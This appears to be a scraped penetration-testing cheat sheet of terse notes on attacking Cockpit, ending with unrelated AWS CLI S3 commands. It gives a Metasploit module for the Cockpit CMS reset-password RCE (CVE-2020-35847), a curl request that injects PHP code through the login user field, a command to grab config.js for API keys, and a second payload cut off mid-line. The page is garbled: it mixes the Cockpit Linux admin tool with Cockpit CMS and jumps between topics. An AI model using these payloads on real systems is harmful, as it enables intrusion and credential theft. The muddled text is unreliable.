Steinz Security

 

  #Config File - API Key curl -kL http://10.10.10.10:9000/config.js

  Cockpit is an interactive server admin interface. It is easy to use and very lightweight. Cockpit interacts directly with the operating system from a real Linux session in a browser. Port: 9090 Github # Reset password (CVE-2020-35847) msf> use exploit/multi/cockpit_cms_rce msf> set USER admin msf> run #Find the Server info - search for string curl http://IP_ADdress:9090/ -o out.txt cat out.txt | grep "var environment" Known Exploits curl -X POST https://example.com/auth/check -H 'User-Agent: Mozilla/5.0' -H 'Content-Type: application/json; charset=UTF-8' -H 'Origin: https://example.com' -d '{"auth":{"user":"test'\'';phpinfo();'\''","password":"b"}}' curl -kL -X POST https://example.com/auth/requestreset -H 'User-Agent: Mozilla/5.0' -H 'Content-Type: application/json; charset=UTF-8' -H 'Origin: https://example.com' -d '{&

  Installation curl "https://awscli.amazonaws.com/awscli-exe-linux-x86_64.zip" -o "awscliv2.zip" unzip awscliv2.zip sudo ./aws/install #Login - Enter Client ID and Client_Secret aws configure S3 Bucket #List S3 Bucket Contents aws s3 ls s3://Bucket_name #Download a file from s3 bucket aws s3 cp s3://Bucket_name/file/path /path/to/save/fil #Upload a file to s3 Bucket aws s3 cp /path/to/upload/filename s3://Bucket_name/file/path #Delte a file on S3 Bucket aws s3 rm s3://Bucket_name/file/path